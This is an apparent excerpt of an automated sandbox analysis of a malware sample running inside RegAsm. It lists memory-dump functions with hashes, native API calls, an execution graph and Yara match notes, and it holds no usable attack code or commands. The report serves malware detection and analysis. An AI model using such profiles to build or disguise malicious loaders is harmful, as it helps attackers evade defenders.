                                                              • Opcode ID: 1a4d6a187e2a73bc990b04aaa8d2e9b0ab8d28aa61cd0fa3566bfd2ad018b7ee
                                                              • Instruction ID: d0d96a017f48467a8a7d9265e859eef91fbf47734308fd2a6f182c51c5f1a96b
                                                              • Opcode Fuzzy Hash: 1a4d6a187e2a73bc990b04aaa8d2e9b0ab8d28aa61cd0fa3566bfd2ad018b7ee
                                                              • Instruction Fuzzy Hash: B76272B07002009BE749DF18C55971A7AE6EF84308F65C46DD10E9F396CBBAD94B8BD1
                                                              Function 0647B888 Relevance: .3, Instructions: 320COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140209895.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6470000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d978bb750cb621469c89ab3f01a2cda683b6c638d5f5177b5887db87be8d3fd9
                                                              • Instruction ID: 4e28ccddba630fb8575a33bb272f0adb7cbaf5bfa97d87a15624e2914c5ca516
                                                              • Opcode Fuzzy Hash: d978bb750cb621469c89ab3f01a2cda683b6c638d5f5177b5887db87be8d3fd9
                                                              • Instruction Fuzzy Hash: CFC19E74A006018FDB95DF69C5986AEBBF2EF89300F05C56AD5069B392CF34ED46CB90
                                                              Function 064A6CD0 Relevance: .2, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140314326.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64a0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d308dba7dcaa131fbe1b5d4f765d5aec55c4e1847c77e9123a7283e7055854fc
                                                              • Instruction ID: 3acc40dee33b5fbd3880f9d142b571a2cb731e79f222be55878d91da7c19ebb4
                                                              • Opcode Fuzzy Hash: d308dba7dcaa131fbe1b5d4f765d5aec55c4e1847c77e9123a7283e7055854fc
                                                              • Instruction Fuzzy Hash: 60918170E00309AFDF51CFA8C98579EBBF2EF58704F19852AE408A7394EB749845CB81
                                                              Function 064D6848 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2140360488.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_64d0000_4Ear91jgQ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $kq$4ccq$4ccq$hkq$hkq
                                                              • API String ID: 0-2107953645
                                                              • Opcode ID: 3885e43fe08907ed39de9b6b8d85fcc9eec5222ea23d8e41970f2ed42d669cf8
                                                              • Instruction ID: c623f242de9d10bcd0e387be6c56f4a89a87115433f2c686cdbe212286a5b86b
                                                              • Opcode Fuzzy Hash: 3885e43fe08907ed39de9b6b8d85fcc9eec5222ea23d8e41970f2ed42d669cf8
                                                              • Instruction Fuzzy Hash: 37A15C70E002048FD755CF69C594A6ABBF6FF89314F26C49AE5499B3A6DB31EC80CB50

                                                              Execution Graph

                                                              Execution Coverage:1.1%
                                                              Dynamic/Decrypted Code Coverage:4.7%
                                                              Signature Coverage:8.7%
                                                              Total number of Nodes:149
                                                              Total number of Limit Nodes:11
                                                              execution_graph 96112 424743 96113 424752 96112->96113 96114 424799 96113->96114 96117 4247da 96113->96117 96119 4247df 96113->96119 96120 42d463 96114->96120 96118 42d463 RtlFreeHeap 96117->96118 96118->96119 96123 42b903 96120->96123 96122 4247a9 96124 42b920 96123->96124 96125 42b931 RtlFreeHeap 96124->96125 96125->96122 96126 42e543 96127 42e553 96126->96127 96128 42e559 96126->96128 96131 42d543 96128->96131 96130 42e57f 96134 42b8b3 96131->96134 96133 42d55e 96133->96130 96135 42b8d0 96134->96135 96136 42b8e1 RtlAllocateHeap 96135->96136 96136->96133 96137 42abc3 96138 42abdd 96137->96138 96141 2f72df0 LdrInitializeThunk 96138->96141 96139 42ac05 96141->96139 96142 42e5a3 96143 42d463 RtlFreeHeap 96142->96143 96144 42e5b8 96143->96144 96259 4243b3 96260 4243cf 96259->96260 96261 4243f7 96260->96261 96262 42440b 96260->96262 96263 42b593 NtClose 96261->96263 96264 42b593 NtClose 96262->96264 96265 424400 96263->96265 96266 424414 96264->96266 96269 42d583 RtlAllocateHeap 96266->96269 96268 42441f 96269->96268 96145 41b083 96146 41b0c7 96145->96146 96147 41b0e8 96146->96147 96149 42b593 96146->96149 96150 42b5b0 96149->96150 96151 42b5c1 NtClose 96150->96151 96151->96147 96152 41e183 96153 41e1a9 96152->96153 96157 41e291 96153->96157 96158 42e5e3 RtlAllocateHeap RtlFreeHeap 96153->96158 96155 41e238 96155->96157 96159 42ac13 96155->96159 96158->96155 96160 42ac30 96159->96160 96163 2f72c0a 96160->96163 96161 42ac5c 96161->96157 96164 2f72c11 96163->96164 96165 2f72c1f LdrInitializeThunk 96163->96165 96164->96161 96165->96161 96270 414093 96271 41409a 96270->96271 96276 417a33 96271->96276 96273 4140c8 96274 41410d 96273->96274 96275 4140fc PostThreadMessageW 96273->96275 96275->96274 96278 417a57 96276->96278 96277 417a5e 96277->96273 96278->96277 96280 417a7d 96278->96280 96283 42e923 96278->96283 96281 417a93 LdrLoadDll 96280->96281 96282 417aaa 96280->96282 96281->96282 96282->96273 96284 42e949 96283->96284 96285 42e994 96284->96285 96288 428d43 96284->96288 96285->96280 96287 42e9e5 96287->96280 96289 428d99 96288->96289 96291 428dad 96289->96291 96292 417ab3 96289->96292 96291->96287 96294 417a64 96292->96294 96293 417a93 LdrLoadDll 96295 417aaa 96293->96295 96294->96293 96294->96295 96295->96291 96296 2f72b60 LdrInitializeThunk 96166 401be9 96167 401bf0 96166->96167 96170 42ea03 96167->96170 96173 42d053 96170->96173 96174 42d079 96173->96174 96185 407613 96174->96185 96176 42d08f 96184 401c29 96176->96184 96189 41ae93 96176->96189 96178 42d0ae 96179 42d0c3 96178->96179 96204 42b953 96178->96204 96200 427653 96179->96200 96182 42d0d2 96183 42b953 ExitProcess 96182->96183 96183->96184 96186 407614 96185->96186 96207 416763 96186->96207 96188 407620 96188->96176 96190 41aebf 96189->96190 96221 41ad83 96190->96221 96193 41af04 96195 41af20 96193->96195 96198 42b593 NtClose 96193->96198 96194 41aeec 96196 41aef7 96194->96196 96197 42b593 NtClose 96194->96197 96195->96178 96196->96178 96197->96196 96199 41af16 96198->96199 96199->96178 96201 4276ad 96200->96201 96203 4276ba 96201->96203 96232 418583 96201->96232 96203->96182 96205 42b970 96204->96205 96206 42b981 ExitProcess 96205->96206 96206->96179 96208 41677a 96207->96208 96210 4167a7 96208->96210 96212 416793 96208->96212 96220 42a503 RtlFreeHeap LdrInitializeThunk 96208->96220 96213 42bfe3 96210->96213 96212->96188 96215 42bffb 96213->96215 96214 42c01f 96214->96212 96215->96214 96216 42ac13 LdrInitializeThunk 96215->96216 96217 42c074 96216->96217 96218 42d463 RtlFreeHeap 96217->96218 96219 42c08d 96218->96219 96219->96212 96220->96210 96222 41ad9d 96221->96222 96226 41ae79 96221->96226 96227 42acb3 96222->96227 96225 42b593 NtClose 96225->96226 96226->96193 96226->96194 96228 42accd 96227->96228 96231 2f735c0 LdrInitializeThunk 96228->96231 96229 41ae6d 96229->96225 96231->96229 96234 4185ad 96232->96234 96233 418a1b 96233->96203 96234->96233 96240 4141b3 96234->96240 96236 4186ba 96236->96233 96237 42d463 RtlFreeHeap 96236->96237 96238 4186d2 96237->96238 96238->96233 96239 42b953 ExitProcess 96238->96239 96239->96233 96246 4141cf 96240->96246 96241 414323 96241->96236 96243 414303 96243->96241 96253 41b1a3 RtlFreeHeap LdrInitializeThunk 96243->96253 96245 414319 96245->96236 96246->96241 96248 4142ef 96246->96248 96249 413c13 96246->96249 96248->96241 96252 41b1a3 RtlFreeHeap LdrInitializeThunk 96248->96252 96254 42b813 96249->96254 96252->96243 96253->96245 96255 42b82d 96254->96255 96258 2f72c70 LdrInitializeThunk 96255->96258 96256 413c35 96256->96248 96258->96256 96297 418c38 96298 42b593 NtClose 96297->96298 96299 418c42 96298->96299

                                                              Executed Functions

                                                              Function 00417A33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 224 417a33-417a5c call 42e163 227 417a62-417a70 call 42e683 224->227 228 417a5e-417a61 224->228 231 417a80-417a91 call 42cb23 227->231 232 417a72-417a7d call 42e923 227->232 238 417a93-417aa7 LdrLoadDll 231->238 239 417aaa-417aad 231->239 232->231 238->239
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                              • Instruction ID: a14b4ffdb5fe0ebae34abb196159bdaefeaa327230b00d9eb3ec642f8eb76095
                                                              • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                              • Instruction Fuzzy Hash: 940112B5E4010DBBDF10DAA5DC42FDEB7789F54304F004196E90897241F635EB548755
                                                              Function 0042B593 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 245 42b593-42b5cf call 4049a3 call 42c643 NtClose
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                              • Instruction ID: 1573654a4f4f23356e70bd42089c4cb39e63ab89980323d43f3de8af3be88636
                                                              • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                              • Instruction Fuzzy Hash: 6BE04676204254BBC220AA6AEC41F9F776DDFC5724F00442AFA08A7282C6B5BA1186E5
                                                              Function 02F72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6d1a49e6fb1a0ff63c62624b3b9492c02b2f1feb30d19c74b6ff8a846dc3efe6
                                                              • Instruction ID: abecfa306faa3e29507cd3b0aa347f5075b0835d871d978d25eee6376dabb3ae
                                                              • Opcode Fuzzy Hash: 6d1a49e6fb1a0ff63c62624b3b9492c02b2f1feb30d19c74b6ff8a846dc3efe6
                                                              • Instruction Fuzzy Hash: A290026120240413420571588454617800B87E0381B95C021E2014594DC53589916125
                                                              Function 02F72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3833d978aed9358b95aaebd5226c3b85ba58bd06e107e60b9ce7a27e5b60cda0
                                                              • Instruction ID: 53e3dd2c38f45f97de1473147925b0259d80ce3fe2724691b16c318076f07c40
                                                              • Opcode Fuzzy Hash: 3833d978aed9358b95aaebd5226c3b85ba58bd06e107e60b9ce7a27e5b60cda0
                                                              • Instruction Fuzzy Hash: 6490023120148C12D2107158C44474B400687D0381F99C411A542465CD86A589917121
                                                              Function 02F72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8b5e68afd370d91e70774a66adf9ff5b14829121f8a7127d5fe667a6e79da49a
                                                              • Instruction ID: f8647b987277b5e1fe2c3cb6e3ce21ea601829a728dca3b6dee3092c34553caf
                                                              • Opcode Fuzzy Hash: 8b5e68afd370d91e70774a66adf9ff5b14829121f8a7127d5fe667a6e79da49a
                                                              • Instruction Fuzzy Hash: 9190023120140823D21171588544707400A87D03C1FD5C412A142455CD96668A52A121
                                                              Function 02F735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9d2bcd9b88abda25324e0edd6ff924dd608e281e2d624ddd933cca78999155c8
                                                              • Instruction ID: beaba43f15038fe404dcefd8247ed03cd40434f147cb36a71058e707b6bc84a3
                                                              • Opcode Fuzzy Hash: 9d2bcd9b88abda25324e0edd6ff924dd608e281e2d624ddd933cca78999155c8
                                                              • Instruction Fuzzy Hash: FD90023160550812D20071588554707500687D0381FA5C411A142456CD87A58A5165A2
                                                              Function 0041401A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H0840I45$H0840I45
                                                              • API String ID: 1836367815-3713557624
                                                              • Opcode ID: 538df40c882e2d7a3066c7db185961e0e3e6e166c66ffa47355d22104a056e7e
                                                              • Instruction ID: e9a8c8687aaeafff36046211043bea6d8f886e60d9afbd7522c3a782f38ba3bd
                                                              • Opcode Fuzzy Hash: 538df40c882e2d7a3066c7db185961e0e3e6e166c66ffa47355d22104a056e7e
                                                              • Instruction Fuzzy Hash: A1118973904158BBDB029B749C46DEFFF7CEF81350B0480AEFA5467142D6394E4287A5
                                                              Function 00414059 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H0840I45$H0840I45
                                                              • API String ID: 1836367815-3713557624
                                                              • Opcode ID: 3c4a1306f931b4ae4b5a2d3eafd16418d431c563271e2b5da18271dec2d654e4
                                                              • Instruction ID: d6e4ff19b95466e9fe5a75fee5ad12c3f5ada0eb833e20bbb35db8e367bde451
                                                              • Opcode Fuzzy Hash: 3c4a1306f931b4ae4b5a2d3eafd16418d431c563271e2b5da18271dec2d654e4
                                                              • Instruction Fuzzy Hash: 6E0166B2D0010C7ADB109FE19C82EEFAB7CDF84798F40802AFA04B7241D2784F4687A5
                                                              Function 0041408B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H0840I45$H0840I45
                                                              • API String ID: 1836367815-3713557624
                                                              • Opcode ID: 0d84d70724cd022c6986e1eab9cdc452da02e3240aa42bc39ebe7d98721977ad
                                                              • Instruction ID: cf9192664244b9ac975f5907ec0277faeb991ed911cf0314b90d64a2ad3432a1
                                                              • Opcode Fuzzy Hash: 0d84d70724cd022c6986e1eab9cdc452da02e3240aa42bc39ebe7d98721977ad
                                                              • Instruction Fuzzy Hash: 9011E5B2D0411C7EEB119FA19C82DEFBB7CDF417A8F008069FA04A7141D6794F0687A5
                                                              Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: H0840I45$H0840I45
                                                              • API String ID: 1836367815-3713557624
                                                              • Opcode ID: 69ff5f2ada4e186b2d2084390961b07a83edfbed09161a37e4636bbb561360f8
                                                              • Instruction ID: 3a752632b7030014dc9c9c30b5bcc15c88147ef53de421226a9d1532deb992d1
                                                              • Opcode Fuzzy Hash: 69ff5f2ada4e186b2d2084390961b07a83edfbed09161a37e4636bbb561360f8
                                                              • Instruction Fuzzy Hash: D901C4B2D0021C7AEB11AFE19C82DEFBB7CDF41798F408069FA14A7241D6794F0647A5
                                                              Function 0042B903 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 71 42b903-42b947 call 4049a3 call 42c643 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B942
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: gA
                                                              • API String ID: 3298025750-3478526202
                                                              • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                              • Instruction ID: fe3716f387f97a3cfac574e56e7d4e73213d1ab919c33c628ae6fa0e6f0a2ede
                                                              • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                              • Instruction Fuzzy Hash: A9E06DB12043047BC620EE59EC45F9B73ACEFC5714F000029FA08A7241C671BA108AF9
                                                              Function 00417AB3 Relevance: 1.6, APIs: 1, Instructions: 104libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 203 417ab3-417abf 204 417ac1-417acf 203->204 205 417a8f-417a91 203->205 206 417ad1-417ad5 204->206 207 417a64-417a65 204->207 208 417a93-417aa7 LdrLoadDll 205->208 209 417aaa-417aad 205->209 210 417ad7-417b09 206->210 211 417b2a 206->211 212 417a6b-417a70 207->212 213 417a66 call 42e683 207->213 208->209 214 417b67-417b91 211->214 215 417b2c-417b2d 211->215 216 417a80-417a8c call 42cb23 212->216 217 417a72-417a7d call 42e923 212->217 213->212 216->205 217->216
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                                                              • Instruction ID: 6c43b7506f89a022c64d044e6c1ccbca58ffe011e8d6516ae037575ea145fc98
                                                              • Opcode Fuzzy Hash: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                                                              • Instruction Fuzzy Hash: 8C219D73A4810A6BDB01D998DC82ADEBB68EF41748F14415AE805DB343EB35EA06C7E5
                                                              Function 0042B8B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 240 42b8b3-42b8f7 call 4049a3 call 42c643 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E238,?,?,00000000,?,0041E238,?,?,?), ref: 0042B8F2
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                              • Instruction ID: d9b541be78cc90539b36e3aa14f4a365451e7fb9285a10e02975410261364557
                                                              • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                              • Instruction Fuzzy Hash: DAE06DB62042047FD620EF59EC45E9B73ACEFC9714F004419F908A7241D671B9108AB9
                                                              Function 0042B953 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 250 42b953-42b98f call 4049a3 call 42c643 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,?,?,0FADE886,?,?,0FADE886), ref: 0042B98A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                                                              • Instruction ID: c24f298f8ce9a33bcb8732fbd3dc6627db416b18a23357072eb898eabaee20fe
                                                              • Opcode Fuzzy Hash: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                                                              • Instruction Fuzzy Hash: 5BE04F756012147BD620AB5AEC41F9B775CDBC5714F40406AFA08A7145C6747A1187F5
                                                              Function 02F72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 184bf865038148e07317c0bae3c7c7b5d2a4cdcee602ce85a4b9a5f63d8a32f0
                                                              • Instruction ID: 97d0cb01594f14322433170552f7ac355482eccf788d28f8b9e2194901ae3a93
                                                              • Opcode Fuzzy Hash: 184bf865038148e07317c0bae3c7c7b5d2a4cdcee602ce85a4b9a5f63d8a32f0
                                                              • Instruction Fuzzy Hash: E8B09B71D015C5D5DB11F7605A08717790567D0791F55C062D3030645E4738C1D1E175

                                                              Non-executed Functions

                                                              Function 02FB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 437c35b5bdd5be92fc2f229b9aaf43e703a35ffdeca18698c12d948185aafa1e
                                                              • Instruction ID: d6a9da0c1f00ff80492fe26bb52d21d757a90ed930fe9f1001ac927457720835
                                                              • Opcode Fuzzy Hash: 437c35b5bdd5be92fc2f229b9aaf43e703a35ffdeca18698c12d948185aafa1e
                                                              • Instruction Fuzzy Hash: 8D928D71A04341ABE722DF26C880BABB7E9BF88794F14491DFB95D7250D770E844CB92
                                                              Function 02F68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • double initialized or corrupted critical section, xrefs: 02FA5508
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA540A, 02FA5496, 02FA5519
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 02FA5543
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA54E2
                                                              • Thread identifier, xrefs: 02FA553A
                                                              • corrupted critical section, xrefs: 02FA54C2
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02FA54CE
                                                              • undeleted critical section in freed memory, xrefs: 02FA542B
                                                              • Address of the debug info found in the active list., xrefs: 02FA54AE, 02FA54FA
                                                              • Invalid debug info address of this critical section, xrefs: 02FA54B6
                                                              • Critical section debug info address, xrefs: 02FA541F, 02FA552E
                                                              • 8, xrefs: 02FA52E3
                                                              • Critical section address, xrefs: 02FA5425, 02FA54BC, 02FA5534
                                                              • Critical section address., xrefs: 02FA5502
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 17f6ea446a3f0db89406f0c54647d1b040dc70c0ee9f22ac26928c0111c7c3f8
